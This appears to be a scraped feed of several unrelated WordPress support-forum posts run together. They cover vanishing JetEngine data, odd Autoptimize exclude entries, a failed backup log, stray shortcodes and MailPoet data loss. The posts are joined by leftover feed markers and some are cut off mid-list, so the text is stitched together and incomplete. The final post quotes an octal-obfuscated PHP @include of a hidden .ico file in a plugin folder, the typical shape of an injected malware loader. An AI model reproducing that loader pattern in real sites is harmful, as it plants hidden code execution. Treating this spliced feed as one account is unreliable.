We built a fairly large site, based on WP, Elementor, and the Crocoblock plugins.
Then, after a couple of months of work and with launch date approaching, things started to randomly disappear. It could be a setting in a field that would suddenly revert to default. It could be a custom post or relationship that would disappear. Whenever we fixed something, something new would break.
It was like trying to push water uphill. No matter what we did, we couldn’t find what was causing this problem. We’d disable all the plugins, and it would still persist.
In the end, we went to the boss and asked for more time. Then we restarted from scratch. Literally a clean WP install, and added only the most necessary plugins: Elementor Pro. JetEngine. A literal handful of others.
For three months, things worked fine. We’d rebuild and recreate what we lost in the first site.
And a few days ago, my colleagues and I started to notice that we’d forgotten to set a value here, or add a custom post type there.
And today, I tried to set a JetEngine listing grid, and the listing produced no results.
So I went into the query for it – and the relationship that underlies the listing is gone. The field is blank.
The query still exists, and it’s worked before – what more, the preview, which doesn’t change until you input new values, is still there, still showing the old, correct results.
Except that the custom relationship it is based on no longer exists.
We’re not doing this cowboy style. We were extremely careful not to install anything that could mess things up.
We’ve got 11 plugins total, all of then reputable, with tens of thousands of downloads, and hundreds of reviews for the smallest ones. No review mentions this kind of problems.
All we’ve used is:
Here’s our setup:
Web searches show a handful of others who’ve encountered something like this. But they’re not using any of the same plugins we are (with the exception of Limit Logins Reloaded, and that shouldn’t be the problem, right?)
It feels like somewhere, there’s a line of code that “pushes” the entire database somehow, throwing out correct records.
Anyone hear about this?
Anyone know what to do about this?
I’m truly at the edge of my tether here – no chance to restore things if the site has gone bad again.
]]>as i checked Autoptimize in an Developer WP-Installation i found these strange entrys in the exclude list:
s_sid, smowtion_size, sc_project, WAU_, wau_add, comment-form-quicktags, edToolbar, ch_client, nonce
I’se searched all files (and inside the files) of the WP-Installation but couldn’t find any trace of these scripts.
Does anybody know, if these entrys in the exclude list are really necessary and / or to which plugin they belong or what they are good for?
Big thx in advance to the communinity and of course Frank Gossens
[STEP] [2021-02-25 08:11:23] Initializing backup…
[INFO] [2021-02-25 08:11:23] Backup & Migration version: 1.0.9
[INFO] [2021-02-25 08:11:23] Site which will be backed up: https://theinsiderexpert.com
[INFO] [2021-02-25 08:11:23] PHP Version: 7.4.3
[INFO] [2021-02-25 08:11:23] Web server: Apache/2.4.41 (Ubuntu)
[INFO] [2021-02-25 08:11:23] Max execution time (in seconds): 259200
[INFO] [2021-02-25 08:11:23] Checking if backup dir is writable…
[INFO] [2021-02-25 08:11:23] Initializing custom error handler
[INFO] [2021-02-25 08:11:23] Premium plugin is enabled and activated
[SUCCESS] [2021-02-25 08:11:23] Yup it is writable…
[INFO] [2021-02-25 08:11:23] PHP CLI is available – plugin will try to run server script.
[STEP] [2021-02-25 08:11:23] Scanning files…
[STEP] [2021-02-25 08:11:24] Checking free space, reserving…
[INFO] [2021-02-25 08:11:24] Requires at least 989841163 bytes. [943.99 MB]
[INFO] [2021-02-25 08:11:24] Disk free space function is not disabled – using…
[INFO] [2021-02-25 08:11:24] Checking this path/partition: /var/www/html/wp-content/backup-migration/backups
[SUCCESS] [2021-02-25 08:11:24] There is 17,562.54 MB free. [17.15 GB]
[SUCCESS] [2021-02-25 08:11:24] Great! We have enough space.
[SUCCESS] [2021-02-25 08:11:24] Confirmed, there is more than enough space, checked: 989841163 bytes
[INFO] [2021-02-25 08:11:24] Scanning done – found 13335 files…
[SUCCESS] [2021-02-25 08:11:24] Backup initialized…
[STEP] [2021-02-25 08:11:24] Initializing archiving system…
[SUCCESS] [2021-02-25 08:11:24] Archive system initialized…
[STEP] [2021-02-25 08:11:24] Preparing map of files…
[SUCCESS] [2021-02-25 08:11:24] Files prepared.
[INFO] [2021-02-25 08:11:24] Starting compression process…
[STEP] [2021-02-25 08:11:24] Smart memory calculation…
[INFO] [2021-02-25 08:11:24] There is 384 MBs of memory to use
[INFO] [2021-02-25 08:11:24] WordPress memory limit: 256 MBs
[SUCCESS] [2021-02-25 08:11:24] Setting the safe limit to 86 MB
[STEP] [2021-02-25 08:11:24] Making database backup
[INFO] [2021-02-25 08:11:24] Iterating database…
[STEP] [2021-02-25 08:11:46] Reverting backup, removing file…
[ERROR] [2021-02-25 08:11:46] There was an error during backup…
[ERROR] [2021-02-25 08:11:46] Call to a member function fetch_row() on bool
[STEP] [2021-02-25 08:11:46] Aborting backup…
[DOWNLOAD GENERATED] File downloaded on (server time): 2021-02-25 08:11:50
[DOWNLOAD GENERATED] Last update (seconds): 27 seconds ago
[DOWNLOAD GENERATED] Last update (date): 2021-02-25 08:11:23
For the last weeks this code is appearing on the top, middle and bottom of every page of the webpage:
vc_row row_content_width=”grid” parallax_background_image=”5559″ parallax_bg_height=”450PX” css=”.vc_custom_1579472440892{margin-top: 0px !important;}”][vc_column][vc_empty_space height=”150px”][vc_column_text css=”.vc_custom_1579472716102{margin-left: 20px !important;}”]
I tried to deactivate all the plugins and reactivate them but it did not help. And after the reactivation, most of the pictures do not display normally but appear in a coded form.
I am a new user and am really struggling to fix this problem.
Thank you for your help. Any suggestions would be really helpful.
Upon contacting Bluehost regarding this issue, they said they were not equipped to troubleshoot this problem and claimed it was possibly a scripting issue.
If there is something I can do to remedy this, that would be great. Otherwise I’ll have to go through the site (page by page) and make the corrections — which would be tedious, but I’ll do what is necessary.
]]>The second time I encounter a problem after an automated update of WordPress on our website with respect to the pluging Mailpoet 3.
We do our newsletters since 3 years via our own provider and it worked perfect.
The indication on the “Settings” page was green and we where happy.
Now the setting is showing still Green and it says “activated”, but the text inside the green frame is RED.
Also all our old Newsletters and customer lists are gone.
The last time this happened I could solve the problem by entering our website from the backend, set the “mailpoet” plugin to “_mailpoet” and reinstalled it again…then everything was fine again.
This time I couldn’t do it this way and the indication is, as explained with a green frame, but red text inside.
Did anyone have the same problem till now and can help me?
Thank you in advance.
For example this entry:
@include “\057v\141r\057w\167w\057h\164m\154/\167o\162d\160r\145s\163/\167p\055c\157n\164e\156t\057p\154u\147i\156s\057h\151d\145-\164i\164l\145/\056d\144a\066d\1427\144.\151c\157”;